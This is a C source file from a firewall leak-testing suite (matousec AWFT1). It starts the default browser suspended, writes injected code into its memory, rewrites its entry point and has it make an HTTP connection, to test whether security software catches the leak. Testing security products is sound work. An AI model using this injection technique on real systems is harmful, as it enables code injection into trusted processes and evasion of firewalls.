/*

 Security Software Testing Suite - AWFT1 (leak-test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * This technique is used by Atelier Web Firewall Tester - Test 1, written by Jos Pascoa, http://www.atelierweb.com/awft/.


 Method description:

   * Find the default browser's executable.

   * Create a suspended default browser's process.

   * Allocate memory in the child process and write an the infection code into it.

   * Modify entry point instructions of the child process so that the infection code is executed.
     This code attempts to access the Internet.

*/

#include <stdio.h>
#include <windows.h>
#include <winsock.h>
#include "include/common.h"
#include "include/common-leak.h"
#include "include/common-univ.h"
#include "include/common-hook.h"


int main(int argc,char **argv)
{
  COM_CONF conf;
  if (!com_console_init_main("AWFT1","awft1",argc,argv,&conf,COM_TEST_TYPE_AWFT1)) return 1;

  char *used_dlls[]={"ntdll.dll","kernel32.dll","ws2_32.dll"};
  if (!com_hook_load_libraries(used_dlls,3)) return 1;

  int res=FALSE;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;
  char *err_prefix=COM_ERR_STANDARD_PREFIX;

  char imagepath[MAX_PATH];
  size_t imagepath_len;
  if (com_get_default_browser_path(imagepath,sizeof(imagepath),&err_inf))
  {
    if (com_verbosity_get()) printf("Default browser's path set to \"%s\".\n",imagepath);
    imagepath_len=strlen(imagepath);

    COM_IMAGE_INFO imageinfo;
    if (com_get_image_info(imagepath,&imageinfo,&err_inf))
    {
      if (com_verbosity_get()) printf("Entry point of \"%s\" found at 0x%p.\n",imagepath,imageinfo.entry_point);

      DWORD flags=CREATE_SUSPENDED | CREATE_NO_WINDOW;
      PCOM_UNIV_JOB jobs[2];
      if (com_univ_job_init(13,2*sizeof(imageinfo)+sizeof(flags)+imagepath_len+1+3*sizeof(HANDLE),8,&jobs[0],&err_inf))
      {
        com_univ_job_stack_init_push(jobs[0],&imageinfo,sizeof(imageinfo));
        com_univ_job_stack_init_push(jobs[0],&flags,sizeof(flags));
        com_univ_job_stack_init_push(jobs[0],imagepath,imagepath_len+1);

        com_univ_job_action_set(jobs[0],0,COM_UNIV_JOB_ACTION_EXECUTE_ALWAYS,com_univ_server_init);
        com_univ_job_action_set(jobs[0],1,0,com_univ_handle_obtain_create_process);

        com_univ_job_action_set_arg(jobs[0],2,1,com_univ_job_stack_push_copy,0);        // copy imageinfo
        com_univ_job_action_set_arg(jobs[0],3,2,com_univ_job_stack_push_copy,-2);       // copy process handle
        com_univ_job_action_set_arg(jobs[0],4,3,com_univ_job_stack_push_copy,-1);       // copy process handle
        com_univ_job_action_set(jobs[0],5,4,com_univ_structure_alloc_write);
        com_univ_job_action_set(jobs[0],6,5,com_univ_infect_rewrite_entry);

        com_univ_job_action_set_arg(jobs[0],7,6,com_univ_job_stack_push_copy,-2);       // copy thread handle
        com_univ_job_action_set(jobs[0],8,7,com_univ_structure_start_resume_thread);

        com_univ_job_action_set_arg(jobs[0],9,8,com_univ_job_stack_push_copy,-1);       // copy process handle
        com_univ_job_action_set(jobs[0],10,9,com_univ_wait_mapping_event_handle);
        com_univ_job_action_set(jobs[0],11,1,com_univ_handle_close);                    // close process handle
        com_univ_job_action_set(jobs[0],12,1,com_univ_handle_close);                    // close thread handle

        struct sockaddr_in server;
        char data[COM_INET_URI_MAX_LEN];

        com_univ_inet_sock_http_init(&server,data,sizeof(data),&conf);
        size_t data_len=strlen(data);

        if (com_univ_job_init(5,sizeof(server)+sizeof(data_len)+data_len,4,&jobs[1],&err_inf))
        {
          com_univ_job_stack_init_push(jobs[1],data,data_len);
          com_univ_job_stack_init_push(jobs[1],&data_len,sizeof(data_len));
          com_univ_job_stack_init_push(jobs[1],&server,sizeof(server));

          com_univ_job_action_set(jobs[1],0,COM_UNIV_JOB_ACTION_EXECUTE_ALWAYS,com_univ_client_init);
          com_univ_job_action_set(jobs[1],1,0,com_univ_load_second_dll);
          com_univ_job_action_set(jobs[1],2,1,com_univ_inet_sock_http);
          com_univ_job_action_set(jobs[1],3,0,com_univ_client_send_result);
          com_univ_job_action_set(jobs[1],4,0,com_univ_client_finit);

          PCOM_UNIV univ=NULL;
          if (com_univ_init(COM_UNIV_INIT_FLAG_WS2_32,"AWFT1",2,jobs,&univ,&err_inf))
          {
            int index=com_univ_main(univ);

            if (!univ->error.occurred)
            {
              memcpy(&univ->error,&univ->server_mapping.data->error,sizeof(univ->error));

              if (!univ->error.occurred)
                res=com_find_pattern_and_print_data(univ->server_mapping.data->buffer,sizeof(univ->server_mapping.data->buffer),&conf,&err_inf);
            }

            if (univ->error.occurred)
            {
              if (univ->error.job_index==1) err_prefix="\nCHILD PROCESS ERROR: ";
              com_univ_server_err_report(univ,&err_inf);
            }

            if (index>=0) com_univ_server_finit(univ,NULL);

            com_univ_finit(univ);
          }

          com_univ_job_finit(jobs[1]);
        }

        com_univ_job_finit(jobs[0]);
      }
    }
  }

  return com_end_pref(res,&err_inf,&conf,err_prefix);
}
